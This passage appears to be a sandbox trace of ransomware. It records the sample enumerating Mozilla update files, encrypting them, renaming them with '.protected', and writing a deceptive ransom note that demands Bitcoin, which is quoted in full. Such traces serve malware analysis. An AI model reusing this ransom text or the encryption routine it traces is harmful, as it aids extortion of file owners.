HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0086.677] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.677] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.677] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.677] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.677] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.677] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\.") returned 82 [0086.677] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.677] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.677] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.677] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.677] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.677] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.677] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.677] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\..") returned 83 [0086.678] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.678] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.678] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="Windows") returned -1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="Program Files") returned -1 [0086.678] lstrcmpiW (lpString1="active-update.xml", 
lpString2="Program Files (x86)") returned -1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="$Recycle.bin") returned 1 [0086.678] lstrcmpiW (lpString1="active-update.xml", lpString2="System Volume Information") returned -1 [0086.678] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 [0086.678] StrStrIW (lpFirst="active-update.xml", lpSrch=".protected") returned 0x0 [0086.678] lstrcmpW (lpString1="active-update.xml", lpString2="RESTORE_FILES.txt") returned -1 [0086.678] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0086.678] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0086.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 [0086.679] StrStrW (lpFirst="active-update.xml", lpSrch=".txt") returned 0x0 [0086.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 [0086.679] StrStrW (lpFirst="active-update.xml", lpSrch=".rar") returned 0x0 [0086.679] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml") returned 98 
[0086.679] StrStrW (lpFirst="active-update.xml", lpSrch=".zip") returned 0x0 [0086.679] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x464, lpOverlapped=0x0) returned 1 [0086.690] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffb9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.690] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x464, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x464, lpOverlapped=0x0) returned 1 [0086.690] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.690] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0086.690] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0086.690] CloseHandle (hObject=0x150) returned 1 [0086.698] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.protected") returned 108 [0086.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml.protected")) returned 1 [0086.699] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="Windows") returned -1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="Program Files") returned 1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="Program Files (x86)") returned 1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="$Recycle.bin") returned 1 [0086.699] lstrcmpiW (lpString1="updates", lpString2="System Volume Information") returned 1 [0086.699] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates") returned 88 [0086.699] lstrcmpW (lpString1="updates", lpString2=".") returned 1 [0086.699] lstrcmpW (lpString1="updates", lpString2="..") returned 1 [0086.699] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\*") returned 90 [0086.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.700] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.700] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.700] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.700] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.700] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.700] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\.") returned 90 [0086.700] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.700] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.700] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.700] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.700] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.700] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.700] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.700] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\..") returned 91 [0086.700] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.700] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.700] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.700] lstrcmpiW (lpString1="0", lpString2="Windows") returned -1 [0086.700] lstrcmpiW (lpString1="0", lpString2="Program Files") returned -1 [0086.701] lstrcmpiW (lpString1="0", lpString2="Program Files (x86)") returned -1 [0086.701] lstrcmpiW (lpString1="0", lpString2="$Recycle.bin") returned 1 [0086.701] lstrcmpiW (lpString1="0", lpString2="System Volume Information") returned -1 [0086.701] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0") returned 90 [0086.701] lstrcmpW (lpString1="0", lpString2=".") returned 1 [0086.701] lstrcmpW (lpString1="0", lpString2="..") returned 1 [0086.701] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\*") returned 92 [0086.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0086.701] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.701] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.701] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.701] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.701] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.701] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\.") returned 92 [0086.701] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.701] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.701] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.701] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.701] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.701] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.701] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.702] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\..") returned 93 [0086.702] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.702] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.702] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 
[0086.702] lstrcmpiW (lpString1="update.mar", lpString2="Windows") returned -1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="Program Files") returned 1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="Program Files (x86)") returned 1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="$Recycle.bin") returned 1 [0086.702] lstrcmpiW (lpString1="update.mar", lpString2="System Volume Information") returned 1 [0086.702] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0086.702] StrStrIW (lpFirst="update.mar", lpSrch=".protected") returned 0x0 [0086.702] lstrcmpW (lpString1="update.mar", lpString2="RESTORE_FILES.txt") returned 1 [0086.702] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.702] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0086.703] StrStrW (lpFirst="update.mar", lpSrch=".txt") returned 0x0 [0086.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0086.703] StrStrW 
(lpFirst="update.mar", lpSrch=".rar") returned 0x0 [0086.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar") returned 101 [0086.703] StrStrW (lpFirst="update.mar", lpSrch=".zip") returned 0x0 [0086.703] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.710] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.710] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.711] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.711] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.715] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.715] CloseHandle (hObject=0x158) returned 1 [0086.715] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.protected") returned 111 [0086.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar.protected")) returned 1 [0086.716] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="Windows") returned -1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="Program Files") returned 1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="Program Files (x86)") returned 1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="$Recycle.bin") returned 1 [0086.716] lstrcmpiW (lpString1="update.status", lpString2="System Volume Information") returned 1 [0086.716] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0086.716] StrStrIW (lpFirst="update.status", lpSrch=".protected") returned 0x0 [0086.716] lstrcmpW (lpString1="update.status", lpString2="RESTORE_FILES.txt") returned 1 [0086.716] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.716] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0086.718] StrStrW (lpFirst="update.status", lpSrch=".txt") returned 0x0 [0086.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0086.718] StrStrW (lpFirst="update.status", lpSrch=".rar") returned 0x0 [0086.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status") returned 104 [0086.718] StrStrW (lpFirst="update.status", lpSrch=".zip") returned 0x0 [0086.718] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0xc, lpOverlapped=0x0) returned 1 [0086.719] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.719] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0xc, lpOverlapped=0x0) returned 1 [0086.719] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.719] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.719] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: 
lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.719] CloseHandle (hObject=0x158) returned 1 [0086.719] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.protected") returned 114 [0086.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.status.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.status.protected")) returned 1 [0086.720] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.720] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.721] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\RESTORE_FILES.txt") returned 108 [0086.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.723] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.723] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.724] lstrlenA (lpString="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") returned 684 [0086.724] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.724] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.724] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.724] CloseHandle (hObject=0x154) returned 1 [0086.724] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.724] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.724] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\RESTORE_FILES.txt") returned 106 [0086.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\updates\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\updates\\e7cf176e110c211b\\updates\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.725] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: 